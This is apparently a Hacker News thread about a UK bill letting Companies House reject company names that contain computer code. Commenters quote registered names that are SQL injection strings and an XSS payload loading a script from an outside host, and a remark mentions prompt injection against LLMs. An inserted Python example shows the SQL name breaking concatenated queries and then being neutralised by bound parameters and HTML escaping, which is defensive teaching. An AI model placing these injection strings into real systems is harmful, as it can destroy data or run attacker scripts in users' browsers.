It seems to have been hackernews'd:<p><a href="https://web.archive.org/web/20231204144437/https://www.parallelparliament.co.uk/mp/alison-thewliss/bill/2022-23/economiccrimeandcorporatetransparency#9369E91A-2B4D-445F-A66B-1A5071727932" rel="nofollow noreferrer">https://web.archive.org/web/20231204144437/https://www.paral...</a><p>It's an entertaining link
There have been several companies like this.<p>Company 10542519 was named "; DROP TABLE "COMPANIES";-- LTD"<p>Company SC656788 is still named ROBERT'); DROP TABLE STUDENTS; LIMITED<p>Company 08768324 named DROP TABLE CONSULTANTS; LTD<p>And company 12956509 was named "><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT> LTD (which you'll note works)<p>There have always been certain restrictions on company names [1] containing words like 'Police' or 'Financial Conduct Authority' and you can't even name your company 'Insurance' without the permission of insurance regulators. So this new rule isn't particularly onerous.<p>In fact, under existing legislation they could have added 'script src' and 'drop table' to an existing list of sensitive words that aren't allowed.<p>[1] <a href="https://www.gov.uk/government/publications/incorporation-and-names" rel="nofollow noreferrer">https://www.gov.uk/government/publications/incorporation-and...</a>
If I read this right, the UK is planning legislation to allow company registries to reject company names that contain "computer code", on the basis that it could be done for the purpose of SQL injection.<p>What's being debated is what is "computer code", and whether this legislation makes any sense at all.
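Added example, not part of any comment in this thread and not Companies House code: it takes two of the company names quoted above and shows them splitting a string-concatenated SQL statement, then being stored as plain data through a bound parameter and rendered inertly with HTML output encoding. The `students` table, the SQLite backend and all function names are assumptions made for illustration.

```python
import html
import sqlite3

# Two company names copied from the thread above.
SQL_NAME = "ROBERT'); DROP TABLE STUDENTS; LIMITED"
XSS_NAME = '"><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT> LTD'


def new_db():
    """In-memory database with a hypothetical `students` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE students (name TEXT)")
    return conn


def table_exists(conn, table):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (table,)
    ).fetchone()
    return row is not None


def register_unsafe(conn, name):
    """Before: the name is spliced into the SQL text, so its quote and
    semicolons are parsed as syntax. Returns True if the table survived."""
    sql = "INSERT INTO students (name) VALUES ('" + name + "');"
    try:
        conn.executescript(sql)  # runs each statement in turn
    except sqlite3.Error:
        pass  # the trailing fragment fails to parse; earlier statements ran
    return table_exists(conn, "students")


def register_safe(conn, name):
    """After: the name is a bound parameter and is never parsed as SQL.
    Returns the stored names."""
    conn.execute("INSERT INTO students (name) VALUES (?)", (name,))
    return [row[0] for row in conn.execute("SELECT name FROM students")]


def render_safe(name):
    """Encode the name for an HTML text or quoted-attribute context."""
    return "<td>" + html.escape(name, quote=True) + "</td>"


if __name__ == "__main__":
    print("table survives string concatenation:", register_unsafe(new_db(), SQL_NAME))
    print("stored via bound parameter:", register_safe(new_db(), SQL_NAME))
    print("rendered:", render_safe(XSS_NAME))
```

With bound parameters and context-appropriate output encoding, both names are ordinary strings to the system that stores and displays them.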
This is the company in question:<p><a href="https://find-and-update.company-information.service.gov.uk/company/" rel="nofollow noreferrer">https://find-and-update.company-information.service.gov.uk/c...</a><p>And a post from the person who registered it<p><a href="https://pizzey.me/posts/no-i-didnt-try-to-break-companies-house/" rel="nofollow noreferrer">https://pizzey.me/posts/no-i-didnt-try-to-break-companies-ho...</a>
Link to the (still up) Hansard: <a href="https://hansard.parliament.uk/Commons/2022-11-01/debates/585ae229-3af6-4374-8e4a-0361ea230fe7/EconomicCrimeAndCorporateTransparencyBill(FifthSitting)#contribution-9369E91A-2B4D-445F-A66B-1A5071727932" rel="nofollow noreferrer">https://hansard.parliament.uk/Commons/2022-11-01/debates/585...</a><p>Also link to previous discussion of the company in question:<p><a href="https://news.ycombinator.com/item?id=27815396">https://news.ycombinator.com/item?id=27815396</a><p>And link to the company: <a href="https://find-and-update.company-information.service.gov.uk/company/10542519" rel="nofollow noreferrer">https://find-and-update.company-information.service.gov.uk/c...</a>
A quick search[0] of the Companies House site gives the following "cheeky" SQL names:<p>- DROP TABLE LTD<p>- DROP TABLE USERS LTD<p>- DROP TABLE CONSULTANTS; LTD<p>- ROBERT'); DROP TABLE STUDENTS; LIMITED<p>[0] <a href="https://find-and-update.company-information.service.gov.uk/search?q=drop+table" rel="nofollow noreferrer">https://find-and-update.company-information.service.gov.uk/s...</a>
Old article about it - <a href="https://www.theguardian.com/uk-news/2020/nov/06/companies-house-forces-business-name-change-to-prevent-security-risk" rel="nofollow noreferrer">https://www.theguardian.com/uk-news/2020/nov/06/companies-ho...</a>
I wonder if this is easier or harder to do when the system you're messing with is an LLM. I doubt it would work reliably, but you should be able to show prompt injection working.
While the call for greater clarity is important, the ambiguity or 'wiggle room' in the phrase is important<p>>>“in the opinion of the Secretary of State”<p>IDK specifically about English law, but I worked directly with the DMV in Vermont. Slightly outside of the project, but the state allows pretty much any vanity plates, of course with the law specifying "shall not be objectively obscene or confusing to the general public". But this leaves room for interpretation. I heard of an incident where a state trooper was sent to retrieve a plate that had inappropriately passed screening, reading "3MTA3" (read it in the mirror).<p>Laws do need to be sufficiently precise to be not abused with selective enforcement, but sufficiently flexible to handle edge cases.
Reminds me of two of my favorite old stories.<p>Hello, I'm Mr. Null: <a href="https://www.wired.com/2015/11/null/" rel="nofollow noreferrer">https://www.wired.com/2015/11/null/</a><p>Falsehoods Programmers Believe About Names: <a href="https://www.kalzumeus.com/2010/06/17/falsehoods-programmers-believe-about-names/" rel="nofollow noreferrer">https://www.kalzumeus.com/2010/06/17/falsehoods-programmers-...</a>
Hmm, what about legit cases, such as naming a company after oneself (i.e. McDonald’s)? There are plenty of people with the family name “Null”, though perhaps not so many in the UK.
The idea that computer code can't be a company name is just begging for clever company names to skirt this rule, especially with so many languages that are light in syntax.<p>SQL is a natural contender with potential queries like “select customers from store” but I'm curious how far this can be taken and what other “computer code” company names other languages would make possible.
It's amazing how much the zeitgeist has changed since this was first published: <a href="https://imgs.xkcd.com/comics/exploits_of_a_mom.png" rel="nofollow noreferrer">https://imgs.xkcd.com/comics/exploits_of_a_mom.png</a><p>Geeks and nerds are no longer the near universally admired weirdos bringing the wonderful future.